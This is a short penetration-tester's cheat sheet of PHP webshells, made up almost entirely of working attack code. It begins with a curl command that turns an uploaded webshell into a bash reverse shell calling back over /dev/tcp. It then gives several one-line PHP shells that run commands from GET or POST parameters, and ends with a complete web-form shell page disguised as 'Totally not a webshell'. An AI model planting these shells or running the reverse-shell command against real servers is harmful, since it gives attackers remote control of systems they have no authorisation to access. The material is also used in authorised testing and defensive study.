# webshells

# upgrading to reverse shell

curl 10.10.10.10/webshell.php --data-urlencode 'cmd=bash -c "bash -i >& /dev/tcp/10.10.10.11/443 0>&1"'

# php

# Execute a command

<?php system("whoami"); ?>

// Same but using shell exec
<?php echo shell_exec("whoami");?>

# PHP webshell using parameter

for example: shell.php?cmd=whoami

<?php system($_GET['cmd']); ?>

// Same but using passthru
<?php passthru($_GET['cmd']); ?>

# Exec() does not output the result without echo, and only output the last line. So not very useful!

<?php echo exec("whoami");?>

# Instead to this if you can. It will return the output as an array, and then print it all.

<?php exec("ls -la",$array); print_r($array); ?>

# preg_replace(). This is a cool trick

<?php preg_replace('/.*/e', 'system("whoami");', ''); ?>

# Using backticks

<?php $output = `whoami`; echo "<pre>$output</pre>"; ?>

# Using backticks

<?php echo `whoami`; ?>

# simple php webshell

<?php if (!empty($_POST['cmd'])) { $cmd = shell_exec($_POST['cmd']); } ?>
<!DOCTYPE html>
<html lang="en">
<head> <title>Totally not a webshell ;)</title> </head>
<body>
    <main>
        <form method="post">
            <label for="cmd"><strong>Command</strong></label>
            <div class="form-group">
                <input type="text" name="cmd" id="cmd" value="<?= htmlspecialchars($_POST['cmd'], ENT_QUOTES, 'UTF-8') ?>"
                       onfocus="this.setSelectionRange(this.value.length, this.value.length);" autofocus required>
                <button type="submit">GO!</button>
            </div>
        </form>
        <?php if ($_SERVER['REQUEST_METHOD'] === 'POST'): ?>
            <h2>Output</h2>
            <?php if (isset($cmd)): ?>
                <pre><?= htmlspecialchars($cmd, ENT_QUOTES, 'UTF-8') ?></pre>
            <?php else: ?>
                <pre><small>No result.</small></pre>
            <?php endif; ?>
        <?php endif; ?>
    </main>
</body>
</html>